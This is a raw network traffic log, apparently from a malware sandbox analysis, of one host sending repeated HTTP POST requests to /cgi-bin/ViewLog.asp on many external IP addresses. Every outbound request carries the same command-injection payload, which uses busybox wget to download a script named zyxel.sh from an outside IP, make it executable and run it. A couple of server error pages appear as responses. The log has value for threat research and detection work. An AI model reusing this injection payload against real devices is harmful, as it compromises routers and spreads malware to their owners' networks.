Nov 22, 2023 08:38:43.439177036 CET	6493	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
308	192.168.2.23	49948	94.120.238.39	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:43.442740917 CET	6494	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
309	192.168.2.23	42118	94.120.236.130	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:43.443010092 CET	6494	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
310	192.168.2.23	35814	31.136.119.104	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:43.584561110 CET	6499	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:44.172353983 CET	6565	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:45.324194908 CET	6701	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:47.820247889 CET	7042	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:52.427242041 CET	7616	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:01.641891956 CET	8801	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:21.863145113 CET	11185	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:58.721854925 CET	15622	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
311	192.168.2.23	33618	31.136.255.47	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:43.584779978 CET	6499	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:44.172338009 CET	6565	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:45.324197054 CET	6702	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:47.820221901 CET	7041	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:52.427262068 CET	7617	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:01.641891003 CET	8800	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:21.863142967 CET	11185	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:58.721854925 CET	15622	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
312	192.168.2.23	55668	85.140.63.21	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:43.665112972 CET	6513	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:43.892215014 CET	6525	IN	HTTP/1.1 404 Content-Type: text/html;charset=utf-8 Content-Language: ru Content-Length: 794 Date: Wed, 22 Nov 2023 07:38:41 GMT Keep-Alive: timeout=20 Connection: keep-alive Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 d0 9d d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 be 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 d0 9d d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 be 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 5b 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 5d 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 39 2e 30 2e 34 30 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="ru"><head><title>HTTP Status 404 </title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 </h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [/cgi-bin/ViewLog.asp] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.40</h3></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
313	192.168.2.23	52018	31.31.79.149	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:43.694354057 CET	6516	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:43.953067064 CET	6549	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:38:43 GMT Server: Apache Content-Length: 127 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 27 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port';</script><h1>Error 400 - trying to redirect</h1>

Session ID	Source IP	Source Port	Destination IP	Destination Port
314	192.168.2.23	48478	94.242.229.90	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:43.695199013 CET	6517	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
315	192.168.2.23	40244	31.136.171.69	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:43.758338928 CET	6518	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:44.332293987 CET	6590	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:45.484143019 CET	6718	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:47.820218086 CET	7041	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:52.427314997 CET	7617	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:01.641875029 CET	8800	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:19.815335035 CET	10957	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
